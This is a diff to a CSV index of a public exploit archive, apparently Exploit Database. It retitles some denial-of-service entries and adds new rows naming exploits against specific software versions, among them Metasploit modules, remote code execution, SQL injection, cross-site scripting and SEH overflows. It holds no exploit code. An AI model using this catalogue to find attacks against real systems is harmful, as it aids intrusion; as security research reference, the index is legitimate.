-39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,dos,windows,
+39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH)",2016-03-14,INSECT.B,dos,windows,
 39560,exploits/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",dos,windows,
 39561,exploits/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",dos,windows,
 39562,exploits/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",dos,windows,
@@ -6228,6 +6228,7 @@ id,file,description,date,author,type,platform,port
 46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
 46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux,
 46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple,
+46048,exploits/multiple/dos/46048.py,"Netatalk 3.1.12 - Authentication Bypass (PoC)",2018-12-21,"Tenable NS",dos,multiple,
 46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
@@ -6278,20 +6279,20 @@ id,file,description,date,author,type,platform,port
 46278,exploits/linux/dos/46278.py,"MiniUPnPd 2.1 - Out-of-Bounds Read",2019-01-29,b1ack0wl,dos,linux,
 46284,exploits/windows/dos/46284.py,"Advanced File Manager 3.4.1 - Denial of Service (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
 46285,exploits/multiple/dos/46285.c,"iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure",2019-01-30,"Google Security Research",dos,multiple,
-46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
-46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
+46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Local Buffer Overflow (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
+46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-30,"Rafael Pedrero",dos,windows,
 46289,exploits/windows/dos/46289.py,"Anyburn 4.3 - 'Convert image to file format' Denial of Service",2019-01-31,"Dino Covotsos",dos,windows,
 46291,exploits/windows/dos/46291.py,"Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)",2019-01-31,"Luis Martínez",dos,windows,
 46292,exploits/windows/dos/46292.py,"AMAC Address Change 5.4 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
 46293,exploits/windows/dos/46293.py,"ASPRunner Professional 6.0.766 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
-46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
+46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-31,"Rafael Pedrero",dos,windows,
 46295,exploits/windows/dos/46295.py,"LanHelper 1.74 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows,
 46296,exploits/macos/dos/46296.c,"macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File",2019-01-31,"Google Security Research",dos,macos,
 46297,exploits/multiple/dos/46297.c,"macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack",2019-01-31,"Google Security Research",dos,multiple,
 46298,exploits/multiple/dos/46298.c,"macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem",2019-01-31,"Google Security Research",dos,multiple,
 46299,exploits/multiple/dos/46299.c,"macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic",2019-01-31,"Google Security Research",dos,multiple,
 46300,exploits/multiple/dos/46300.c,"macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics",2019-01-31,"Google Security Research",dos,multiple,
-46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)",2019-02-01,"Rafael Pedrero",dos,windows,
+46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)",2019-02-01,"Rafael Pedrero",dos,windows,
 46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows,
 46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
 46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
@@ -6299,6 +6300,10 @@ id,file,description,date,author,type,platform,port
 46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
 46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
 46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
+46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android,
+46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows,
+46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows,
+46346,exploits/windows/dos/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10281,6 +10286,10 @@ id,file,description,date,author,type,platform,port
 46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
 46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
 46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
+46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
+46335,exploits/windows/local/46335.py,"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)",2019-02-11,Achilles,local,windows,
+46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
+46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17142,7 +17151,6 @@ id,file,description,date,author,type,platform,port
 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
 46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
 46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
-46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
@@ -17157,6 +17165,9 @@ id,file,description,date,author,type,platform,port
 46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
 46307,exploits/linux/remote/46307.py,"LibSSH 0.7.6 / 0.8.4 - Unauthorized Access",2018-10-20,jas502n,remote,linux,
+46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx,
+46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80
+46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40799,3 +40810,10 @@ id,file,description,date,author,type,platform,port
 46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
 46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
 46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
+46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
+46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
+46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
+46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,
+46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
+46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux,
+46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,